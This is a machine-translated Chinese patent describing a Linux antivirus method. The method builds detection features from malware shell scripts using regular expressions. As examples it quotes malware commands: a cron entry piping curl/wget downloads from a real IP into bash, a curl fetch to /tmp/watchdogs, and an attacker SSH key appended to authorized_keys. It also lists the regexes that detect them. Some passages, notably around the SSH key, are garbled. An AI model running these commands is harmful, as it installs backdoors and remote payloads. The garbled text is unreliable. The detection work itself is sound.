CN111723372A

CN111723372A - Virus checking and killing method and device and computer readable storage medium

Info

Publication number: CN111723372A
Application number: CN202010578310.7A
Authority: CN
Inventors: 范楷朋
Original assignee: Sangfor Technologies Co Ltd
Current assignee: Sangfor Technologies Co Ltd
Priority date: 2020-06-22
Filing date: 2020-06-22
Publication date: 2020-09-29
Anticipated expiration: 2040-06-22
Also published as: CN111723372B

Abstract

The invention discloses a virus searching and killing method, a virus searching and killing device and a computer readable storage medium, wherein the virus searching and killing method comprises the following steps: acquiring a set of objects to be detected in equipment to be detected; matching the set of objects to be detected with a first characteristic item set to obtain a first matching result, wherein the first characteristic item set is generated based on a sample shell script corresponding to a virus; and when the first matching result is that the matching is successful, determining that the virus exists in the equipment to be detected, and clearing the virus in the equipment to be detected. According to the method, the set of the objects to be detected is matched with the first characteristic item set generated based on the sample shell script corresponding to the virus, and when the matching is successful, the virus in the equipment to be detected is eliminated.

Description

Virus checking and killing method and device and computer readable storage medium

Technical Field

The present invention relates to the field of virus searching and killing, and in particular, to a virus searching and killing method, device and computer readable storage medium.

Background

The method for checking and killing the Linux virus in the industry at present is static file scanning and checking and killing, and the method mainly performs characteristic scanning on an ELF file and a shell script in a device system to be detected, and isolates the file and a process if the ELF file and the shell script are malicious. However, most of Linux viruses are shell scripts, the confusion degree is high, the virus killing engines are difficult to detect, and the virus can be persistently attacked by other modes along with the rise of a non-file mode, so that even if the virus killing engines can check and kill virus files, the virus is frequently repeatedly infected, and the virus cannot be thoroughly checked and killed.

The above is only for the purpose of assisting understanding of the technical aspects of the present invention, and does not represent an admission that the above is prior art.

Disclosure of Invention

The invention mainly aims to provide a virus searching and killing method, a virus searching and killing device and a computer readable storage medium, and aims to solve the technical problems that viruses are difficult to detect and persistent attacks of the viruses are difficult to detect in the prior art, so that the viruses are repeatedly infected and cannot be thoroughly searched and killed.

In order to achieve the above object, the present invention provides a virus searching and killing method, which comprises the following steps:

acquiring a set of objects to be detected in equipment to be detected;

matching the set of objects to be detected with a first characteristic item set to obtain a first matching result, wherein the first characteristic item set is generated based on a sample shell script corresponding to a virus;

and when the first matching result is successful matching, determining that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.

Preferably, the first feature item set includes: virus file path characteristics;

before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:

traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;

extracting a first character string positioned after a first preset identifier from the first code segment;

and obtaining a virus file path characteristic based on the first character string, and adding the virus file path characteristic to a first characteristic item set.

Preferably, the obtaining of the virus file path characteristics based on the first character string includes,

judging whether the first character string contains a preset character or not;

if the first character string contains the preset character, the first character string is used as a virus file path characteristic;

and if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.

Preferably, the first feature item set includes: a virus process name characteristic;

searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;

extracting a second character string positioned behind a second preset identifier from the second code segment;

and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic to a first characteristic item set.

Preferably, the first feature item set includes: a timed task feature;

searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;

extracting a third string located between third preset identifications from the third code segment;

and taking the extracted third character string as a timing task characteristic, and adding the timing task characteristic to a first characteristic item set.

Preferably, the first feature item set includes: a network connection tool feature;

searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;

extracting a fourth character string positioned between fourth preset identifications from the fourth code segment;

and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.

Preferably, the matching the set of objects to be detected with the first feature item set includes,

and matching the set of objects to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated based on codes for carrying out malicious behaviors in a sample shell script, and the second characteristic item set is generated based on codes for clearing other viruses in the sample shell script.

Preferably, the second feature item set includes: a virus filename feature for clearing other viruses;

searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;

extracting a fifth character string positioned after a fifth preset identifier from the fifth code segment;

and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses to a second feature item set.

Preferably, the second feature item set includes: a virus process name feature for clearing other viruses;

searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;

extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;

and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses to a second feature item set.

Preferably, the second feature item set includes: monitoring port characteristics;

searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;

extracting a seventh character string positioned after a seventh preset identifier from the seventh code segment;

and acquiring a monitoring port characteristic based on the seventh character string, and adding the monitoring port characteristic to a second characteristic item set.

Preferably, said deriving a listening port characteristic based on said seventh string comprises,

judging whether the seventh character string is a preset normal service port or not;

and if not, taking the seventh character string as a monitoring port characteristic.

Preferably, the second feature item set includes: a communication tool feature;

searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;

and taking the eighth code segment as a communication tool characteristic, and adding the communication tool characteristic to a second characteristic item set.

Preferably, the removing of the virus in the device to be detected comprises,

and removing the object successfully matched with the first characteristic item set in the object set to be detected in the equipment to be detected.

Preferably, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, including,

judging whether the current sample shell script is in an encrypted state;

and if the judgment result is that the current sample shell script is in an encrypted state, decrypting the current sample shell script.

In addition, to achieve the above object, the present invention also provides a virus searching and killing apparatus, including: the system comprises a memory, a processor and a virus killing program stored on the memory and capable of running on the processor, wherein the virus killing program is configured to realize the steps of the virus killing method.

In addition, to achieve the above object, the present invention further provides a computer readable storage medium, having a virus searching and killing program stored thereon, where the virus searching and killing program, when executed by a processor, implements the steps of the virus searching and killing method as described above.

According to the invention, the set of the object to be detected is matched with the first characteristic item set generated based on the sample shell script corresponding to the virus, and when the matching is successful, the virus in the equipment to be detected is eliminated.

Drawings

FIG. 1 is a schematic structural diagram of a virus killing apparatus in a hardware operating environment according to an embodiment of the present invention;

FIG. 2 is a schematic flow chart of a first embodiment of the virus searching and killing method according to the present invention;

FIG. 3 is a schematic flow chart of a virus searching and killing method according to a second embodiment of the present invention;

FIG. 4 is a schematic flow chart of a third embodiment of the virus searching and killing method according to the present invention;

FIG. 5 is a schematic flow chart of a fourth embodiment of the virus searching and killing method according to the present invention;

FIG. 6 is a schematic flow chart of a fifth embodiment of the virus searching and killing method of the present invention;

FIG. 7 is a flowchart illustrating a sixth embodiment of the virus searching and killing method according to the present invention;

FIG. 8 is a schematic flow chart of a seventh embodiment of the virus searching and killing method according to the present invention;

FIG. 9 is a schematic flow chart of an eighth embodiment of the virus searching and killing method according to the present invention;

FIG. 10 is a flowchart illustrating a ninth embodiment of the virus searching and killing method according to the present invention;

FIG. 11 is a flowchart illustrating a tenth exemplary embodiment of the virus searching and killing method according to the present invention;

the implementation, functional features and advantages of the objects of the present invention will be further explained with reference to the accompanying drawings.

Detailed Description

It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention.

As shown in fig. 1, the virus killing apparatus may include: a processor 1001, such as a CPU, a communication bus 1002, a user interface 1003, a network interface 1004, and a memory 1005. Wherein a communication bus 1002 is used to enable connective communication between these components. The user interface 1003 may include a Display screen (Display), an input unit such as a Keyboard (Keyboard), and the optional user interface 1003 may also include a standard wired interface, a wireless interface. The network interface 1004 may optionally include a standard wired interface, a wireless interface (e.g., WI-FI interface). The memory 1005 may be a high-speed RAM memory or a non-volatile memory (e.g., a magnetic disk memory). The memory 1005 may alternatively be a storage device separate from the processor 1001.

Those skilled in the art will appreciate that the configuration shown in FIG. 1 is not intended to be limiting and may include more or fewer components than those shown, or some components may be combined, or a different arrangement of components.

As shown in fig. 1, a memory 1005, which is a kind of computer storage medium, may include therein an operating system, a network communication module, a user interface module, and a virus killer program.

In the virus antivirus apparatus shown in fig. 1, the network interface 1004 is mainly used for data communication with an external network; the user interface 1003 is mainly used for receiving input instructions of a user; the virus killing apparatus calls a virus killing program stored in the memory 1005 by the processor 1001, and performs the following operations:

acquiring a set of objects to be detected in equipment to be detected;

Further, the first feature item set includes: virus file path characteristics; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the processor 1001 may call the virus killer stored in the memory 1005, and further perform the following operations:

judging whether the first character string contains a preset character or not;

Further, the first feature item set includes: a virus process name characteristic; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the first feature item set includes: a timed task feature; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the first feature item set includes: a network connection tool feature; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second feature item set includes: a virus filename feature for clearing other viruses; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second feature item set includes: a virus process name feature for clearing other viruses; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second feature item set includes: monitoring port characteristics; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second feature item set includes: a communication tool feature; before the acquiring of the set of objects to be detected in the device to be detected, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the processor 1001 may call the virus killer stored in the memory 1005, and further perform the following operations:

judging whether the current sample shell script is in an encrypted state;

According to the scheme, the set of the objects to be detected is matched with the first characteristic item set generated based on the sample shell script corresponding to the viruses, and when the matching is successful, the viruses in the equipment to be detected are eliminated.

Based on the hardware structure, the embodiment of the virus searching and killing method is provided.

Referring to fig. 2, fig. 2 is a schematic flow chart of a virus killing method according to a first embodiment of the present invention.

In a first embodiment, the virus killing method comprises the following steps:

s10: acquiring a set of objects to be detected in equipment to be detected;

it can be understood that the device to be detected may be a device that needs to be subjected to virus detection, especially a device that needs to be subjected to Linux virus detection, and the device to be detected may be an electronic device such as a notebook computer, a desktop computer, a tablet computer, or a mobile phone.

The set of objects to be detected may include at least one of a process list and a timing task list of the device to be detected, for example. In a specific embodiment, a ps-elf command and a crontab-l command can be used to obtain a process list and a timed task list of the device to be tested, respectively.

S20: matching the set of objects to be detected with a first characteristic item set to obtain a first matching result, wherein the first characteristic item set is generated based on a sample shell script corresponding to a virus;

it should be understood that the first feature item set is generated based on a sample shell script corresponding to a virus, and the first feature item set comprises at least one of a virus file path feature, a virus process name feature, a timing task feature and a network connection tool feature. And matching the set of objects to be detected with the first feature item set, namely matching the objects in the set of objects to be detected with the features in the first feature item set in sequence, and generating a first matching result based on matching.

The sample shell scripts corresponding to the viruses can be obtained based on a historical database, that is, the sample shell scripts corresponding to the historical viruses are all stored in the historical database, for example, in the historical database, there may be a plurality of sample shell scripts corresponding to the viruses, for example, there may be 1000, 2000, and the like.

S30: and when the first matching result is successful matching, determining that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.

It can be understood that, when the first matching result is that matching is successful, the virus in the device to be tested is determined to be present and is eliminated. In a specific embodiment, the removing of the viruses in the device to be detected includes removing objects, which are successfully matched with the first feature item set, in the set of objects to be detected in the device to be detected.

Further, as shown in fig. 3, a second embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: virus file path characteristics;

before step S10, the virus killing method further includes:

s101: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

it can be understood that sample shell scripts corresponding to viruses are all stored in a historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the first feature item set, the current sample shell scripts are all operated.

S201: searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;

it can be understood that after the current sample shell script is obtained, a first code segment is searched from the current sample shell script through a first regular expression, wherein virus file path characteristics exist in the first code segment. For example, the scripts are all throughThe first code segment in which the curl or wget character string exists can be searched from the current sample shell script through a first regular expression, and the obtained first code segment is, for example, curl-fssl http:// thyrsi. com/t6/672/1550667479 × 1822611209. j-o/tmp/watchdogs。

S301: extracting a first character string positioned after a first preset identifier from the first code segment;

after obtaining the first code segment based on the first regular expression, the first character string located after the first preset identifier is further extracted from the first code segment, and the above embodiment is continued, and the obtained first code segment is curl-fsslhttp:// thysi. com/t6/672/1550667479 × 1822611209. jpg-o/tmp/watchdogs. Extracting a first character string from the first preset identifier to obtain/tmp/watchdogsThat is, in this embodiment, the first preset flag is-o, and the extracted first character string is/tmp/watchdogs。

S401: and obtaining a virus file path characteristic based on the first character string, and adding the virus file path characteristic to a first characteristic item set.

It should be understood that after the first character string is obtained, a virus file path feature is obtained based on the first character string, and the virus file path feature is added to the first feature item set to form a part of the first feature item set.

Further, the obtaining of the virus file path characteristics based on the first character string includes,

judging whether the first character string contains a preset character or not;

It can be understood that after the first character string is obtained, it is first determined whether the first character string contains a preset character, and if the first character string contains the preset character, the first character string is directly used as a virus file path feature. Continuing with the above embodiment, for example, the default character is set to/, and the first string is obtained/tmp/watchdogsIt can be seen that the first character string contains the preset character, and therefore, the obtained first character string can be directly used as the path feature of the virus file.

When the first character string does not include the preset character, the obtained first character string needs to be converted, and the converted first character string is used as a virus file path characteristic.

Taking the converted first character string as a virus file path characteristic, the method is specifically divided into two conditions:

in the first case: the first character string does not include $, for example, the obtained first character string is mspi139f, at this time, a command of searching the cd command switching directory upwards is needed, a/tmp/mspi 139f is spliced, and the/tmp/mspi 139f is used as a virus file path feature.

In the second case: the first string includes $, for example, the first string is $ cron, and the string 'cron ═ xxx' needs to be searched upwards to obtain cron ═ lib64/libgc + +. so, at this time, the/lib 64/libgc + +. so is taken as the virus file path feature.

Further, after step S101, the virus killing method further includes:

judging whether the current sample shell script is in an encrypted state;

In the embodiment, after a current sample shell script is obtained, whether the current sample shell script is in an encrypted state is judged, if the judgment result shows that the current sample shell script is in the encrypted state, the current sample shell script is decrypted firstly, and then a step of determining a code segment from the current sample shell script based on a regular expression is executed; and if the judgment result shows that the current sample shell script is not in an encrypted state, directly executing the step of determining the code segments from the current sample shell script based on the regular expression.

Further, as shown in fig. 4, a third embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: a virus process name characteristic;

before step S10, the virus killing method further includes:

s102: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

S202: searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;

it can be understood that after the current sample shell script is obtained, a second code segment is searched from the current sample shell script through a second regular expression, wherein the second code segment has a virus process name characteristic. For example, the function of the nopup command is to run a process in the background, and basically, viruses start the process in this way, so the corresponding virus process name feature can be obtained by searching the second code segment containing the nopup character string and then intercepting the second character string of the surface after the second preset identifier. Specifically, a second code segment with a nohup character string may be searched from the current sample shell script through the second regular expression, and specifically, the obtained second code segment is, for example: nohup/lib 64/launchUpdate.

For example, to run a virus process, an executable authority (x) must be added to the file, so that the corresponding virus process name feature can be obtained by searching for a second code segment containing a chmod + x character string and then intercepting a second character string of the surface after the second preset identifier. Specifically, a second code segment with a chmod + x character string may be searched from the current sample shell script through the second regular expression, and specifically, the obtained second code segment is, for example: chmod + x mspi139 f.

S302: extracting a second character string positioned behind a second preset identifier from the second code segment;

it is understood that, after obtaining the second code segment based on the second regular expression, the second character string located after the second preset identifier is further extracted from the second code segment, and continuing with the above embodiment, when the obtained second code segment is: when nohup/lib64/launchUpdate, the second character string after the second preset identifier is extracted to obtain launchUpdate, that is, in this embodiment, the second preset identifier is the last one/, and the extracted second character string is launchUpdate.

When the resulting second code segment is: when chmod + x mspi139f, a second character string after the second preset identifier is extracted to obtain mspi139f, that is, in this embodiment, the second preset identifier is chmod + x, and the extracted second character string is mspi139 f.

S402: and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic to a first characteristic item set.

It should be understood that after the second character string is obtained, the extracted second character string is taken as a virus process name feature, and the virus process name feature is added to the first feature item set to form a part of the first feature item set.

Further, as shown in fig. 5, a fourth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: a timed task feature;

before step S10, the virus killing method further includes:

s103: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

S203: searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;

it is to be understood that after the current sample shell script is obtained, a third code segment is searched from the current sample shell script through a third regular expression, wherein a timing task characteristic exists in the third code segment. For example, the third code segment is searched for by a third regular expression ' echo. + >, ' var/spool/cron/+ ', ' echo. + >, +/etc. +/cron.d/+ ' or ' echo. + |. crontab- ' and then a third character string located between third preset marks is intercepted, so that the corresponding timing task feature can be obtained. Specifically, the third code segment searched from the current sample shell script by 'echo. + > +/var/spawn/croon/+', 'echo. + > +/etc. +/cron.d. +' or 'echo. + |. + - + crontab-' is echo-e "/1 |. root (curr-s http://107.189.11.170/2start. jpg// wget-q-o-http:// 107.189.11.170/2start. jj) | bash # >/sh #/etc./c/cron #.d/root.

S303: extracting a third string located between third preset identifications from the third code segment;

it is understood that after obtaining the third code segment based on the third regular expression, a third string located between third preset identifiers is further extracted from the third code segment, and the above embodiment is continued, when the obtained third code segment is: echo-e "/1" # "(curl-shttp:// 107.189.11.170/2start. jpg// wget-q-o-http:// 107.189.11.170/2start. jpg) | bash-sh \ n # #" >/etc/cron.d/root, extracting a third character string positioned between the third preset marks to obtain a curve-1 star root (curve-s http://107.189.11.170/2start. jpg// wget-q-o-http:// 107.189.11.170/2start. jpg) | bash-sh \ n # #, that is, in this embodiment, the third preset mark is "", and the extracted third string is "/1 ×" (curl-shttp:// 107.189.11.170/2start. jpg// wget-q-o-http:// 107.189.11.170/2start. jpg) | bash-sh \ n # #.

S403: and taking the extracted third character string as a timing task characteristic, and adding the timing task characteristic to a first characteristic item set.

It should be understood that after the third string is obtained, the extracted third string is taken as a timing task feature, and the timing task feature is added to the first feature item set to form a part of the first feature item set.

Further, as shown in fig. 6, a fifth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: a network connection tool feature;

before step S10, the virus killing method further includes:

s104: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

S204: searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;

it can be understood that after the current sample shell script is obtained, a fourth code segment is searched from the current sample shell script through a fourth regular expression, wherein a network connection tool characteristic exists in the fourth code segment. For example, the fourth code segment is searched through a fourth regular expression 'echo. + >/root/. ssh/authorized _ keys', and then a fourth character string located between fourth preset identifications is intercepted, so that the corresponding network connection tool feature can be obtained. Specifically, the fourth code segment that is looked up from the current sample shell script by 'echo' + >/root/. ssh/authorized _ keys 'is echo "ssh-rsaAAAAB 3NzaC1yc2EAAAABIwAAAQEAv54 nagwgwgm 626zrsUeI0bnVYgjgs/ux7v5phk1bZYFHEm +3Aa0gfu5 yqdnhp 01abaKxWJ97mrM5a2VAfTN + n6 kwnrzpazpahtiuhnusw 7E" >/root/. ssh/authorized _ keys'.

S304: extracting a fourth character string positioned between fourth preset identifications from the fourth code segment;

it is understood that, after obtaining the fourth code segment based on the fourth regular expression, a fourth character string located between fourth preset identifiers is further extracted from the fourth code segment, and the above embodiment is continued, when the obtained fourth code segment is: when the fourth character string located between the fourth preset marks is extracted to ssh-rsa AAAAB3NzaC1yc2EAAAABiwAAAQEAv54nAGwGwm626zrsUeI0bnVygjgs/ux7v5phk1bZYFHEM +3Aa0gfu EQyQdnhTP01abaKxWJ97mrM a2VAfTN + n6 KuNyRzpapDKiwnUSW 7 ">/root/. ssh/authored _ keys, the fourth character string located between the fourth preset marks is extracted to ssh-rsa AAB3NzaC1yc2 EAAAABIwAAv 54 nGwGwGwmusw 626 zm 626 zUveI 0 bnyVgjgs/ux 7v5phk bZyVyWyWyWaWyWaWyWaWyWdAAW 7 +3 nWyWyWyWaWyWaWyWaWyWyWyWK 7, the fourth character string located between the fourth preset marks is extracted to ssh-rsa AAAAB3 NzaaAAb 3 NzafAAbVvyWyWyWyWyWdWdWdWdWdWdWK 7, the fourth character string located between the fourth preset marks is extracted to obtain a 5 KvyWyWyWyWaWaWyWyWaWyWaWyWyWyWyWaWaWyWyWaWdWdWaWdWdWaWdWdWK 7 and the fourth character string, wherein the fourth character string is found in the fourth preset marks of the fourth character string is found in the fourth preset marks of ssh-rsh-rsa 7, the fourth preset marks of the fourth character string, the fourth character string.

S404: and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.

It should be understood that, after obtaining the fourth character string, the extracted fourth character string is taken as a network connection tool feature, and the network connection tool feature is added to the first feature item set to form a part of the first feature item set.

Further, as shown in fig. 7, a sixth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, step S20 includes,

and S20', matching the set of objects to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated through codes for carrying out malicious behaviors in a sample shell script, and the second characteristic item set is generated through codes for eliminating other viruses in the sample shell script.

It can be understood that, in order to detect the virus in the device to be detected more comprehensively, the set of objects to be detected may be matched with the configuration file, where the configuration file includes not only the first characteristic item set but also the second characteristic item set, so that the matching range of the objects to be detected in the device to be detected is expanded, and the virus in the device to be detected may be searched more comprehensively. The first characteristic item set is generated through codes which are based on malicious behaviors in the sample shell script, and the second characteristic item set is generated through codes which are based on other virus elimination in the sample shell script.

It can be understood that, in general, a sample shell script of a certain virus (hereinafter referred to as a first virus) includes two major parts of code, where the first major part of code is code that performs malicious behavior, specifically, code that performs malicious behavior by the first virus; the second most part of codes are codes for eliminating other viruses, and because the viruses are mutually exclusive, the sample shell script of the first virus also has codes for eliminating other viruses, the code for eliminating other viruses can obtain characteristic items related to other viruses except the first virus in the code for eliminating other viruses, and a set formed by the characteristic items is called as a second characteristic item set.

The second feature item set comprises at least one of a virus file name feature for removing other viruses, a virus process name feature for removing other viruses, a listening port feature, and a communication tool feature.

Further, as shown in fig. 8, a seventh embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: a virus filename feature for clearing other viruses;

before step S10, the virus killing method further includes:

s105: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

it can be understood that sample shell scripts corresponding to viruses are all stored in the historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the second feature item set, the current sample shell scripts are all operated.

S205: searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;

it can be understood that after the current sample shell script is obtained, a fifth code segment is searched from the current sample shell script through a fifth regular expression, wherein a virus file name characteristic for clearing other viruses exists in the fifth code segment. For example, the fifth code segment is searched through a fifth regular expression 'rm-rf. +' and then a fifth character string located after the fifth preset identifier is intercepted, so that the corresponding virus file name characteristic for clearing other viruses can be obtained. Specifically, the fifth code segment that is searched from the current sample shell script by 'rm-rf. +' is rm-rf/usr/bin/config.

S305: extracting a fifth character string positioned after a fifth preset identifier from the fifth code segment;

it is understood that, after the fifth code segment is obtained based on the fifth regular expression, the fifth character string after the fifth preset identifier is further extracted from the fifth code segment, and the above embodiment is continued, when the obtained fifth code segment is: json, extracting a fifth character string located after a fifth preset identifier to obtain/usr/bin/config.json, that is, in this embodiment, the fifth preset identifier is-rf, and the extracted fifth character string is/usr/bin/config.json.

S405: and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses to a second feature item set.

It should be understood that, after the fifth character string is obtained, the extracted fifth character string is taken as a virus file name feature for clearing other viruses, and the virus file name feature for clearing other viruses is added to the second feature item set to form a part of the second feature item set.

Further, as shown in fig. 9, an eighth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: a virus process name feature for clearing other viruses;

before step S10, the virus killing method further includes:

s106: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

S206: searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;

it is understood that after the current sample shell script is obtained, a sixth code segment is searched from the current sample shell script through a sixth regular expression, wherein a virus process name characteristic for clearing other viruses exists in the sixth code segment. For example, the sixth code segment is searched through a sixth regular expression 'ps. + |. + xargs kill', and then a sixth character string located after the sixth preset identifier is intercepted, so that the corresponding virus process name feature for clearing other viruses can be obtained. Specifically, the sixth code segment that is looked up from the current sample shell script by 'ps. + |. + xargs kill' is ps auxfgrep hwlh3wlh44lh | awk '{ print $2 }' | xargs kill-9.

S306: extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;

it is to be understood that, after the sixth code segment is obtained based on the sixth regular expression, the sixth character string after the sixth preset identifier is further extracted from the sixth code segment, and the above embodiment is continued, when the obtained sixth code segment is: ps auxf grep hwlh3wlh44lh | awk '{ print $2 }' | xargs kill-9, extracting the sixth character string located after the sixth preset identification, which is grep in this embodiment, to obtain hwlh3wlh44lh, i.e., hwlh3wlh44 lh.

S406: and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses to a second feature item set.

It should be understood that, after the sixth character string is obtained, the extracted sixth character string is taken as a virus process name feature for clearing other viruses, and the virus process name feature for clearing other viruses is added to the second feature item set to form a part of the second feature item set.

Further, as shown in fig. 10, a ninth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: monitoring port characteristics;

before step S10, the virus killing method further includes:

s107: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

S207: searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;

it is to be understood that after the current sample shell script is obtained, the seventh code segment is searched from the current sample shell script through the seventh regular expression, wherein the listening port feature exists in the seventh code segment. For example, the seventh code segment is searched through the seventh regular expression 'netstat, + | xargs, + kill', and then the seventh character string located after the seventh preset identifier is intercepted, so that the corresponding characteristics of the listening port can be obtained. Specifically, the seventh code segment that is looked up from the current sample shell script by 'netstat, + xargs, + kill' is netstat-anp | grep:443| awk '{ print $7 }' | awk-F '[/] "{ print $1 }' | xargs-1% kill-9%.

S307: extracting a seventh character string positioned after a seventh preset identifier from the seventh code segment;

it is understood that, after obtaining the seventh code segment based on the seventh regular expression, a seventh character string located after the seventh preset identifier is further extracted from the seventh code segment, and continuing with the above embodiment, when the obtained seventh code segment is: when netstat-anp | grep:443| awk '{ print $7 }' | awk-F '[/] "{ print $1 }' | xargs-1% kill-9%, the seventh string located after the seventh preset mark is extracted to obtain 443, that is, in the present embodiment, the seventh preset mark is grep, and the extracted seventh string is 443.

S407: and acquiring a monitoring port characteristic based on the seventh character string, and adding the monitoring port characteristic to a second characteristic item set.

It should be understood that after the seventh string is obtained, a listening port feature is obtained based on the seventh string, and the listening port feature is added to a second feature item set to form a part of the second feature item set.

Further, the obtaining of the listening port characteristic based on the seventh string includes,

It can be understood that, after the seventh character string is obtained, it is first determined whether the seventh character string is a preset normal service port, and if the seventh character string is the preset normal service port, the seventh character string is not used as a monitoring port feature, so that the port represented by the seventh character string can normally operate. If the port is not the preset normal service port, the port is possibly a port for the communication between the virus and the outside, and the seventh character string is used as the monitoring port characteristic. Continuing with the above embodiment, for example, the preset normal service port is 23, the obtained seventh character string is 443, it can be seen that the seventh character string is not the preset normal service port, and therefore, the seventh character string can be used as a listening port feature.

Further, as shown in fig. 11, a tenth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: a communication tool feature;

before step S10, the virus killing method further includes:

s108: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;

S208: searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;

it can be understood that after the current sample shell script is obtained, an eighth code segment is searched from the current sample shell script through an eighth regular expression, wherein the eighth code segment has communication tool characteristics. For example, the eighth code segment is searched for the eighth regular expression '[ a-zA-Z0-9] {1,20} \\[ a-zA-Z0-9] {1,20} \[ a-zA-Z0-9] {1,20 }', so that the corresponding communication tool characteristics can be obtained. Specifically, the eighth code segment that is looked up from the current sample shell script by '[ a-zA-Z0-9] {1,20} \[ a-zA-Z0-9] {1,20} \[ a-zA-Z0-9] {1,20 }' is mine.

S308: and taking the eighth code segment as a communication tool characteristic, and adding the communication tool characteristic to a second characteristic item set.

It should be understood that after the eighth code segment is obtained, the extracted eighth code segment is used as a communication tool feature, and the communication tool feature is added to a second feature item set to form a part of the second feature item set.

In addition, an embodiment of the present invention further provides a computer-readable storage medium, where a virus searching and killing program is stored on the computer-readable storage medium, and when executed by a processor, the virus searching and killing program implements the following operations:

acquiring a set of objects to be detected in equipment to be detected;

Further, the first feature item set includes: virus file path characteristics; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

Further, the virus killer program when executed by the processor further implements the following operations:

judging whether the first character string contains a preset character or not;

Further, the first feature item set includes: a virus process name characteristic; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

Further, the first feature item set includes: a timed task feature; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

Further, the first feature item set includes: a network connection tool feature; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

Further, the second feature item set includes: a virus filename feature for clearing other viruses; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

Further, the second feature item set includes: a virus process name feature for clearing other viruses; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:

